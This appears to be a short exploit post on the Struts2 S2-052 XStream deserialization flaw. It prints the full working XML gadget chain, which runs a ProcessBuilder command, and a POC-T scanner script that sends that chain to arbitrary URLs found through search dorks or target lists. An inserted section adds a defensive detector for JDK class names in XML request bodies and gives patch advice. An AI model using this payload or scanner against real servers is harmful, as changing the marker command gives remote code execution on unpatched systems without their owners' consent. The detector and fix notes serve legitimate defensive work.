# 0x01
One Poc One Day —— Struts2 052
# 0x02
## Principle
The Struts2 REST plugin's XStreamHandler hands incoming XML straight to XStream for deserialization without any type filtering, so deserializing an XML payload can lead to remote code execution. Any attacker who can reach a REST plugin endpoint can craft malicious XML content to escalate privileges.
## Payload
```xml
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>touch</string>
                        <string>/tmp/success</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>
```
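From the defender's side, the payload above has a recognisable shape: an XML body sent to a REST plugin endpoint whose `class="..."` attributes name JDK-internal types (`jdk.nashorn...`, `javax.crypto...`, `java.lang.ProcessBuilder`) that no application model ever needs. The following scanner, an added example and not code from the original post, runs that check over a handful of constructed request records (tab-separated method, path, content type and body; the record format and the `RequestRecord` name are assumptions for the example). It tags both the known S2-052 markers and the more general "JDK type in a class attribute" signal, so it also catches XStream chains that use different gadgets.

```python
import re
from dataclasses import dataclass

# A class="" attribute naming a JDK or JDK-internal package is suspicious in any
# REST model body: legitimate models reference application types, not java.*.
GADGET_CLASS_PATTERN = re.compile(
    r'class\s*=\s*"(?:java\.|javax\.|jdk\.|com\.sun\.|sun\.)[\w.$]+"'
)

# Types the S2-052 chain relies on, used to label a hit as that known chain.
KNOWN_MARKERS = (
    "jdk.nashorn.internal.objects.NativeString",
    "java.lang.ProcessBuilder",
    "javax.crypto.CipherInputStream",
    "javax.imageio.spi.FilterIterator",
    "com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data",
)


@dataclass
class RequestRecord:  # hypothetical record shape for this example
    method: str
    path: str
    content_type: str
    body: str


def is_xml_request(rec):
    """Only bodies the REST plugin would route to XStreamHandler are relevant."""
    ct = rec.content_type.lower()
    return rec.method.upper() in ("POST", "PUT") and (
        "application/xml" in ct or "text/xml" in ct
    )


def inspect_request(rec):
    """Return (flagged, hits): known S2-052 markers plus the generic JDK-type signal."""
    if not is_xml_request(rec):
        return False, []
    hits = [m for m in KNOWN_MARKERS if m in rec.body]
    if GADGET_CLASS_PATTERN.search(rec.body):
        hits.append("jdk-type-in-class-attribute")
    return bool(hits), hits


def parse_record(line):
    """Parse one constructed record: METHOD<TAB>PATH<TAB>CONTENT-TYPE<TAB>BODY."""
    method, path, ctype, body = line.split("\t", 3)
    return RequestRecord(method, path, ctype, body)


def scan(lines):
    """Return [(path, hits)] for every record that looks like an XStream gadget body."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        flagged, hits = inspect_request(rec)
        if flagged:
            alerts.append((rec.path, hits))
    return alerts


# Constructed sample records, not real traffic. The third reuses the opening
# elements of the S2-052 chain shown above; the others are benign bodies.
SAMPLE_RECORDS = [
    "POST\t/orders.json\tapplication/json\t{\"id\": 7, \"status\": \"paid\"}",
    "POST\t/orders.xml\tapplication/xml\t<order><id>7</id><status>paid</status></order>",
    "POST\t/orders.xml\tapplication/xml\t<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags>"
    "<value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"><dataHandler>"
    "<dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">",
    "GET\t/orders/7.xml\ttext/html\t",
]

if __name__ == "__main__":
    for path, hits in scan(SAMPLE_RECORDS):
        print(path, hits)
```

Detection like this is a stop-gap; the actual fix is the Struts release that added type filtering to XStreamHandler (2.5.13 / 2.3.34), and where the REST plugin is only used for JSON the advisory's workaround of dropping `xml` from `struts.action.extension` removes the XML handler entirely.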
## Poc
Um... all of this is to work with POC-T: adapt more PoCs and accumulate more scripts of your own.
```python
"""
Struts2 S2-052
Affected versions: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

Usage:
    python POC-T.py -s struts2-s2052 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080"
    python POC-T.py -s struts2-s2052 -aZ "login.action"
    python POC-T.py -s struts2-s2052 -iF FILE.txt
"""

import requests


# POC-T loads each script and calls its poc(url) entry point. The function name
# was lost in the original post; "poc" is assumed here from that convention.
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    try:
        header = dict()
        header['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        # An XML content type makes the REST plugin route the body to XStreamHandler.
        header['Content-Type'] = "application/xml"
        header['Connection'] = "close"
        header['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        # Same gadget chain as in the Payload section; it only creates the /tmp/success marker file.
        payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'''
        response_data = requests.post(url, data=payload, headers=header)
        # A 500 response or the Provider$Service stack trace in the body means the XML was deserialized.
        if response_data.status_code == 500 or r"java.security.Provider$Service" in response_data.text:
            return '[s2-052]' + url
        else:
            return response_data.text
    except Exception:
        return False
```